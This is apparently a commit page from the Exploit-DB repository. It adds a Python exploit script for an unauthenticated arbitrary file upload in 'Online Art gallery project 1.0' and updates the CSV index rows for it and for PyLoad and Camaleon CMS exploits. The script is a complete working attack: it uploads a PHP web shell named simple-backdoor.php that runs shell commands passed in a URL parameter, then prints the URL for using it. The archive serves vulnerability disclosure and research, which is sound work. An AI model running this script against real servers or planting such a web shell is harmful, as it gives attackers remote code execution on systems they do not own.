DB: 2023-06-16
2 changes to exploits/shellcodes/ghdb Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated) PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
This commit is contained in:
Exploit-DB
parent
158fcdfd5c
commit
1e4f82620a
2 changed files with 47 additions and 2 deletions
44
exploits/php/webapps/51524.py
Executable file
44
exploits/php/webapps/51524.py
Executable file
|
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
|
||||
# Google Dork: n/a
|
||||
# Date: 14/06/2023
|
||||
# Exploit Author: Ramil Mustafayev
|
||||
# Vendor Homepage: https://github.com/projectworldsofficial
|
||||
# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
|
||||
# CVE : n/a
|
||||
|
||||
# Vulnerability Description:
|
||||
#
|
||||
# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
|
||||
# Usage: python exploit.py http://example.com
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
def upload_file(url, filename, file_content):
|
||||
files = {
|
||||
'sliderpic': (filename, file_content, 'application/octet-stream')
|
||||
}
|
||||
|
||||
data = {
|
||||
'img_id': '',
|
||||
'sliderPicSubmit': ''
|
||||
}
|
||||
url = url+"/Admin/adminHome.php"
|
||||
try:
|
||||
response = requests.post(url, files=files, data=data)
|
||||
except:
|
||||
print("[!] Exploit failed!")
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print("Usage: python exploit.py <target_url>")
|
||||
sys.exit(1)
|
||||
|
||||
target_url = sys.argv[1]
|
||||
file_name = "simple-backdoor.php"
|
||||
file_content = '<?php system($_GET["c"]);?>'
|
||||
|
||||
upload_file(target_url, file_name, file_content)
|
||||
print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
|
||||
|
|
@ -24609,6 +24609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip,
|
||||
47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,,
|
||||
51337,exploits/php/webapps/51337.txt,"Online Appointment System V1.0 - Cross-Site Scripting (XSS)",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
|
||||
51524,exploits/php/webapps/51524.py,"Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)",2023-06-15,"Ramil Mustafayev",webapps,php,,2023-06-15,2023-06-15,0,,,,,,
|
||||
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
|
||||
47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,,
|
||||
48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,,
|
||||
|
|
@ -34525,7 +34526,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
|
||||
38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
|
||||
49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
|
||||
51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,,
|
||||
51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-15,1,CVE-2023-0297,,,,,
|
||||
39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
|
||||
51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
|
||||
51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
|
||||
|
|
@ -34553,7 +34554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
|
||||
45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
|
||||
45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
|
||||
51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-05-26,0,CVE-2023-30145,,,,,
|
||||
51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-06-15,1,CVE-2023-30145,,,,,
|
||||
51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
|
||||
46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
|
||||
41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue